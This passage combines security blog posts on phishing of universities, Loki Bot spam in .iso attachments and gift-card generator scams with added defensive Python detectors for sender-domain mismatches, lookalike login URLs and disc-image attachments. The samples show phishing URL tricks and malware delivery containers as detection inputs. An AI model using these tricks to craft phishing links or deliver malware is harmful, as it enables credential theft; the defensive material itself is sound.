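    # Only a mismatch when the signature names at least one domain and the sender is not among them.
    mismatch = bool(named) and sender not in named
    return {"sender_domain": sender, "signature_domains": sorted(named), "mismatch": mismatch}


# Constructed sample messages (hypothetical domains, not taken from the article).
LEGIT = """From: Anna Smith <anna.smith@example-corp.com>
To: buyer@customer.example
Subject: Invoice 2023-17

Please find the invoice attached.

--
Anna Smith, Accounts
example-corp.com | anna.smith@example-corp.com
"""

SUSPECT = """From: Anna Smith <anna.smith@mail-invoices.example.net>
To: buyer@customer.example
Subject: Invoice 2023-17

Please find the invoice attached.

--
Anna Smith, Accounts
https://www.example-corp.com | anna.smith@example-corp.com
"""

if __name__ == "__main__":
    for label, raw in (("legitimate", LEGIT), ("suspect", SUSPECT)):
        print(label, check_message(raw))
```

The second message reads like the first, but its From address sits on a different registrable domain than the one the signature advertises, which is exactly the mismatch the tip describes. A mailbox rule or gateway filter can quarantine or annotate such messages rather than rely on every employee spotting the difference.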
Phishing for knowledge (https://securelist.com/phishing-for-knowledge/88268/, published Wed, 24 Oct 2018 10:00:15 +0000)

When we talk about phishing, top of mind are fake banking sites, payment systems, as well as mail and other globally popular services. However, cybercriminals have their fingers in far more pies than that. Less obviously, perhaps, students and university faculty are also in the line of fire. The reason is the research they carry out and the potentially valuable results.

Examples of phishing pages mimicking the login pages of the University of Washington, Harvard Business School, and Stanford University websites

Over the past year, we’ve registered phishing attacks against 131 universities in 16 countries. More than half (83 universities) are located in the US, followed by Britain (21), and Australia and Canada (7 each). Several well-known universities in Finland, Colombia, Hong Kong, India, Israel, the Netherlands, New Zealand, Poland, South Africa, Sweden, Switzerland, and the UAE have also experienced at least one phishing attack in the past year. The most popular universities for fraudsters so far this year are: University of Washington (11.6% of attacks), Cornell University (6.8%), University of Iowa (5.1%).

Although universities are aware of the need to protect their resources, fraudsters exploit the traditional weakest link: user inattentiveness. Depending on the level of access (lecturer, student, research associate), personal accounts on the university site can provide access to both general information as well as paid services and research results. Moreover, a lecturer’s account, for example, can provide attackers with information about salary, schedule, etc. All this can be used for identity theft or a targeted attack.

Cornell NetID is a unique electronic identifier used in combination with a password to provide access to non-public resources and university information

Phishing pages typically differ from the original only by the web address. However, despite the browser warning and, as in the case of the Cornell University fake page, the prompt to check the address bar (copied by the attackers from the original site), users often fail to spot the difference.

Besides login credentials, phishing pages can collect other information for bypassing anti-fraud systems

While analyzing the scripts of one of the phishing pages, we noticed that alongside user names and passwords, fraudsters collect information about IP addresses and the victim’s location. Cybercriminals can use this data to circumvent anti-fraud systems by masquerading as account holders.

How to stay protected

An old, but still important tip is to check the address bar of the site on which confidential data is about to be entered. But since this method relies solely on the human factor, the main recommendation for educational institutions is to use two-factor authentication, and for users — a software solution with anti-phishing capability.
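Since a phishing page differs from the real login page mainly in its web address, the address-bar check above can be turned into a small allow-list classifier that a browser extension, proxy or user-awareness tool could run. The code below is an added example, not Kaspersky's or any university's tooling; the trusted domains and brand keywords are constructed for the demo. It treats a URL as trusted only when its registrable domain is on the allow-list, and as a lookalike when a brand name appears in the host, the path, or the user-info part before "@" (which browsers ignore when choosing the server), the trick of placing the real domain somewhere other than where the browser looks.

```python
from urllib.parse import urlparse

# Constructed allow-list (assumption): the registrable domains an institution really uses for login.
TRUSTED_DOMAINS = {"cornell.edu", "washington.edu"}
# Brand words whose presence in an untrusted URL suggests impersonation (also constructed).
BRAND_KEYWORDS = {"cornell": "cornell.edu", "washington": "washington.edu"}


def registrable(host: str) -> str:
    """Last two labels of a host name; a real deployment would use the public-suffix list."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def classify_login_url(url: str) -> tuple:
    """Return (verdict, domain): 'trusted', 'lookalike' (domain = the brand being imitated),
    'unknown' (no brand name found) or 'invalid' (no host at all)."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if not host:
        return ("invalid", "")
    domain = registrable(host)
    if domain in TRUSTED_DOMAINS:
        return ("trusted", domain)
    # The brand can be smuggled into a subdomain ("netid.cornell.edu.evil.example"),
    # the path ("evil.example/cornell/login") or the user-info ("cornell.edu@evil.example").
    haystack = " ".join(filter(None, [host, parts.path.lower(), (parts.username or "").lower()]))
    for keyword, impersonated in BRAND_KEYWORDS.items():
        if keyword in haystack:
            return ("lookalike", impersonated)
    return ("unknown", domain)


if __name__ == "__main__":
    # Constructed URLs for the demo; the non-trusted hosts are placeholders, not real sites.
    for u in (
        "https://netid.cornell.edu/login",
        "https://netid.cornell.edu.verify-account.example/login",
        "https://cornell.edu@verify-account.example/login",
        "https://www.example.org/news",
    ):
        print(classify_login_url(u), u)
```

The point of the "lookalike" verdict is that a domain can contain the university's name and still belong to someone else; only the registrable domain, which the browser uses to pick the server, decides who receives the credentials. Two-factor authentication, as recommended above, limits the damage when the check is missed.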

Loki Bot: On a hunt for corporate passwords (https://securelist.com/loki-bot-stealing-corporate-passwords/87595/, published Wed, 29 Aug 2018 13:00:47 +0000)

Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot. The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.

ISO images are copies of optical discs that can be mounted in a virtual CD/DVD drive to be used in the same way as the originals. Whereas in days of yore users needed dedicated software to open this type of image, today’s operating systems support the format out of the box, and if you want to access the contents of the file, all you need to do is double-click. Malicious spam uses this type of file as a container for delivering malware, albeit rarely.
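Because modern Windows mounts an .iso on double-click, a mail filter should treat disc images as executable containers rather than documents. The script below is an added example and not Kaspersky's detection logic: it walks a message's attachments and flags any whose name carries a disc-image extension or whose content starts with the ISO 9660 primary volume descriptor (type byte 1 followed by "CD001" at offset 0x8000), so an image renamed to look like a PDF is still caught. The sample message and the header bytes it carries are constructed for the demo and contain no malware.

```python
import email
from email import policy
from email.message import EmailMessage

# Disc-image extensions that current Windows versions mount on double-click.
SUSPICIOUS_EXTENSIONS = {".iso", ".img"}


def is_iso9660(data: bytes) -> bool:
    """ISO 9660 images carry a primary volume descriptor at offset 0x8000: type byte 1, then 'CD001'."""
    return len(data) >= 0x8006 and data[0x8000] == 1 and data[0x8001:0x8006] == b"CD001"


def flag_disc_image_attachments(raw: bytes) -> list:
    """Return (filename, reasons) for every attachment that looks like a disc image by name or by content."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        reasons = []
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in SUSPICIOUS_EXTENSIONS:
            reasons.append("extension " + ext)
        if is_iso9660(data):
            reasons.append("ISO 9660 signature")
        if reasons:
            hits.append((name, reasons))
    return hits


# Constructed sample payloads (not real files): a minimal ISO 9660 header and a PDF header.
ISO_SAMPLE = b"\x00" * 0x8000 + b"\x01CD001\x01" + b"\x00" * 64
PDF_SAMPLE = b"%PDF-1.4\n%constructed document for the demo\n"


def build_sample(filename: str, data: bytes) -> bytes:
    """Build a constructed spam-style message with one binary attachment (hypothetical addresses)."""
    msg = EmailMessage()
    msg["From"] = "accounts@supplier.example"
    msg["To"] = "finance@victim.example"
    msg["Subject"] = "Payment confirmation"
    msg.set_content("Please see the attached document.")
    msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, payload in (("invoice.iso", ISO_SAMPLE), ("invoice.pdf", ISO_SAMPLE), ("invoice.pdf", PDF_SAMPLE)):
        print(name, flag_disc_image_attachments(build_sample(name, payload)))
```

Checking the content signature as well as the extension matters because the extension is the sender's claim while the volume descriptor is what the operating system actually acts on. A gateway that blocks or quarantines on either signal removes this delivery container without needing a signature for the specific Loki Bot sample inside it.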

As mentioned above, hackers were sending out copies of Loki Bot to company email addresses that could be obtained from public sources or from the companies’ own websites.

The emailed messages were notably diverse:

  1. Fake notifications from well-known companies

     Imitating messages from well-known corporations is one of the most popular tricks in the hackers’ arsenal. Interestingly enough, fake emails used to be directed mostly at common users and customers, whereas now companies are increasingly the target.

  2. Fake notifications containing financial documents

     The scammers passed off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually no more than a few lines and the subject mentioning what exactly is purported to be attached.

  3. Fake orders or offers

     Phishers may pose as customers placing an order, or a vendor offering their goods or services.

Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why today it’s essential for corporate security measures to include both technical protection and training for employees, because their actions may cause irreparable damage to the business.

Online generators… of dashed expectations (https://securelist.com/giftcard-generators/86522/, published Thu, 19 Jul 2018 10:00:32 +0000)

Quite recently, we (and hence our security solutions) started to designate an entire class of sites — gift card generators — as fraudulent, despite their not stealing any money or personal data from visitors. Why? Let’s try to unpick these sites and see how they work.

How it works

Ads for all kinds of generators can be seen in spam emails and the banners of dubious advertiser networks. The quality of such sites can range from professional to shoddy, but the essence is always the same: the visitor is offered a freely generated gift card code for iTunes, Google Play, Amazon, Steam, and the like. A single site can offer cards of any value for almost every service out there.

As usual with phishing sites, there is no word about why the creators are so charitable, yet plenty of reviews from grateful customers who report that the “generated” code did the trick (if not the first, then the tenth or the hundredth).

A professionally designed generator site…

It should be noted that the code generation algorithms of major firms like Apple or Google are well shielded against attack. And according to cybersecurity experts, the only high-profile case of this kind — when the iTunes code generation algorithm was allegedly compromised by Chinese hackers back in 2009 — was actually more akin to a money laundering scheme. Gift cards supplied by smaller stores are less well protected, but also of little interest to scammers.

… and a simpler variant

To get a code, the user first selects a gift card on the site, whereupon the system begins the “code generation” (or “hacking”) process. To make everything more believable, as in hacker movies, there are plenty of on-screen messages about server connections and other seemingly important operations.

The user does not get to see the generated code in its entirety until confirmation is given that they are human, not a robot. This requires clicking a link and completing a task.

To get the code, users must prove that they are not a robot

Depending on their country of residence, the user might be asked to take a survey, play a lottery, provide details (phone number, postal address), subscribe to a paid SMS service, install adware (which redirects all user searches, harvests information about online activity, and resists deletion), or do something else. The nature of the task is determined by the partner network owning the site that the user is redirected to. The network, in turn, is selected based on the country of residence: each domain zone has partner networks catering to the laws and languages of various countries.

Download a paid ringtone, play a lottery, share personal data — basically, do something risky to prove you’re not a robot

The upshot is unpleasant, but predictable: the victim is either led around various partner sites until they tire of filling out forms and playing lotteries, or they are rewarded with a random set of symbols that has nothing to do with a real code and only mimics the format.

Note that owners of code generator sites try to avoid outright fraud or phishing. They are more than happy with the funds they get from “selling user actions” on partner sites: revenue can range from a few cents for a click on a link to tens of dollars for a filled-out form or a subscription to a paid service. Scrupulous advertisers (they do exist!) in the partner network assume that they are getting data from users genuinely interested in their particular product or service. But the unscrupulous ones don’t really care, as long as they can use this data for spam or similar purposes. This deception of users (and sometimes advertisers too) is the reason why we started to classify generator sites as fraudulent. But the topic of honest and dishonest partners is a discussion for another day.

Exceptions

There are legitimate sites and services that give users discounts and gift cards as part of a loyalty program (for example, in exchange for points earned or purchases made in partner stores). TokenFire and Swagbucks are examples of legitimate apps. Their gift card codes are purchased from the vendor openly and honestly, and issued to clients who have done enough to cover the company’s expenses and deliver a profit. In other words, to receive a gift, the user has to spend a sizable amount of money and/or time. By contrast, generator sites look far more appealing, since they require very little. But as our research shows, that is because they give even less in return — nothing in fact, besides dashed expectations.
